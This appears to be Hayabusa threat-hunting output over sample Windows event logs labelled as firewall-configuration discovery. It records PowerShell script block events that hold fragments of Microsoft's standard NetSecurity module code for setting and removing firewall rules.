Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:IcmpType'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DynamicTarget')) { [object]$__cmdletization_value = ${DynamicTarget} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallRule' function Remove-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if 